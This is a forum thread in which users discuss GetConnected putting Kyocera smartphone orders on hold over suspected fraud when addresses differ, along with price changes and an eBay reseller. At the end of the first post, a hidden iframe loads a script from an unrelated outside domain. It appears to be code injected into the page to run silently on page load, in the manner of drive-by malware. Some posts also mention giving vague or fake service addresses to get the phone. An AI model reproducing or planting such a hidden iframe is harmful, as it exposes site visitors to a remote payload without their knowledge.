+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

GetConnected Putting Orders On Hold

I ordered my phone on the web last night. When the web showed it was still in processing today, I called. The rep told me that they are having a lot of fraudulent activity and my order was on hold because the service address, shipping address and credit card address were different. He asked me where the phone was being activated. I told him that I would activate it in Maryland. He asked me a few more questions about the where it was being shipped to, my home and office phone number etc. and then said he would release the phone.

I don't know if anyone else has had or will have the same experience, but if you order off the web and do not see it out of processing, you should call GetConnected. I don't know if they would have called me, but I am leaving for Germany for a few days and am happpy I decided to check on the order.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Ha. Some people were claiming on this board that getconnected.com salespeople on the phone were practically encouraging the service/shipping address trick in order to get the phone, or atleast saying they know what your doing and they dont care. I wonder if there is some other fraudelant activity going on or they are just talking about how people here are getting their phones. Interesting.

Well I ordered it 2 days ago with the service address as:

123 Any Street

somewhere in TX. and it went fine.

Perhaps Alltel got into the mix. They are not having as many new or existing subscribers activating the phone on their network as they had planned or hoped. If they were only allocated 200 phones via GetConnected as I heard from a Kyocera guy, they would expect all 200 to be in use on their network.

Originally posted by Beryl
    Perhaps Alltel got into the mix. They are not having as many new or existing subscribers activating the phone on their network as they had planned or hoped. If they were only allocated 200 phones via GetConnected as I heard from a Kyocera guy, they would expect all 200 to be in use on their network.
    I am willing to bet it was because of the guy who was advertising them on eBay and on usenet newsgroups. He was charging people $750 for the phone, then just logging onto Getconnected and ordering for them, at a $100 premium.

Alan

Originally posted by alanb
    I am willing to bet it was because of the guy who was advertising them on eBay and on usenet newsgroups. He was charging people $750 for the phone, then just logging onto Getconnected and ordering for them, at a $100 premium.
    That is more likely it, Alan.

I can't for the life of me understand why a person would spend $100 MORE for a phone from some guy on eBay. It is not like someone is getting an unregistered weapon and need anonymity. What advantage does one get to acquire a phone that way. (OK -- this commentary is off-topic. I'll cease on this thread).

I agree with Alan. When I got mine from getconnected I told them straignt out that I would never activate with Alltel and that I lived in the Canada. The rep couldn't care less - I think the guy on e-bay is the one screwing everything up.

Originally posted by Beryl
    That is more likely it, Alan.

I can't for the life of me understand why a person would spend $100 MORE for a phone from some guy on eBay. It is not like someone is getting an unregistered weapon and need anonymity. What advantage does one get to acquire a phone that way. (OK -- this commentary is off-topic. I'll cease on this thread).

:topic-off

Just one last off thread comment then...

I know of two reasons people might have bought from him.

1) They didn't know of another way. If all they saw was his advertisements, hadn't seen our discussions here, or the people (including me) flaming the ads on usenet, they might have believed it was the only way to get the phone. The guy was making up some story about having aquired the phones "from an Alltel insider".

2) Don't have a credit card. He was accepting PayPal payments. I don['t think you can get new Cell service without a credit card, but you can certainly change phones on an existing account without one. personally, I would never spend $750 with someone who ONLY takes Paypal either, but some people are more careless with there money (which may be why they don't have a credit card )

Alan

If the real reason IS the internet dink...

I will be soooooo mad. I was planning on ordering on the 20th if no action by Verizon. If that $%&# screwed it up, I believe I will have to hunt him down.

The sense I got was that they weren't concerend about activiation, since I told him I would be activating it in Maryland and he didn't seem concerned. It sounded like some people may be making off with the phones, giving fraudulent addresses. However, I just checked again and my order is still hasn't moved beyond being processed, so I am going to call again.

Okay, I just called again. They have released my order, but the phone won't ship until tomorrow. I questioned them further and their concern is over all the orders with different shipping and credit card addresses and vague service addresses and no activation. Those are the prime conditions for them to be ripped off. (Stolen credit card, etc.) They stilll don't seem to care about where it is being activated. My advice is to order over the phone if you are using different addresses. They like asking questions to verify you are not stealing the phone.

Originally posted by lnoble
    Okay, I just called again. They have released my order, but the phone won't ship until tomorrow. I questioned them further and their concern is over all the orders with different shipping and credit card addresses and vague service addresses and no activation. Those are the prime conditions for them to be ripped off. (Stolen credit card, etc.) They stilll don't seem to care about where it is being activated. My advice is to order over the phone if you are using different addresses. They like asking questions to verify you are not stealing the phone.
    Did you pay $649.99 or $699.99 ?

Originally posted by lnoble
    I buy your story more than the ebay guy. First off, the ebay guy although ripping his customers off is in fact paying getconnected so getconnected could care less. But since the billing address is different than all the other address, security issue is involved. What stop a thief from ordering a phone or two with a stolen credit card that is active (They would deny the order if the card is inactive) and sent it to a temp address. Thief goes there in 2 days and pickup the phone and disappears.

I think the best way is sent it to a business address, at least the address is more concrete.

3_D

Did you pay $649.99 or $699.99 ?

Looks like they did raise the price to $ 699!!! .:cashwalle

http://partner.getconnected.com/kyoc...honesOnly_view

I was sooooooo close to finally giving in to my weakness and ordering one. I guess I'll have to wait on Verizon or Sprint's I700 now :bawling

Administrator
    wait for the i7! its goona be hard to beat...

Re: Did you pay $649.99 or $699.99 ?

Originally posted by 3_D
    Looks like they did raise the price to $ 699!!! .:cashwalle

http://partner.getconnected.com/kyoc...honesOnly_view

I was sooooooo close to finally giving in to my weakness and ordering one. I guess I'll have to wait on Verizon or Sprint's I700 now :bawling
    Quite a surprise, eh? I wonder if Kyocera raised the wholesale price, or if getconnected.com is just throwing a little retailer markup in, in light of demand?

They must have done that over night. I ordered last night and got it for $649. Whew!

Yesterday--Wed @4:30 p.m. E.S.T. I paid 649.

I orderdered via phone.

Today I had not received confomation that the ordered had shipped and the Customer Service rep stated exactly what the previous post stated "re fradulent orders". After he confirmed the credit card number and the shipping address, the order was release for 2nd day delivery.

Looks like the law of supply and demand is coming into play.

Free enterprise is a geat thing!

lucky you!
    iPhone therefore iAm.

i hope they dont go after the phones they already sold. I say If they want my phone they will have to "pry it from my cold dead hands" after i finished surfing of course...
    Thomas

6035 Kyocera Smartphone

7135 Kyocera Smartphone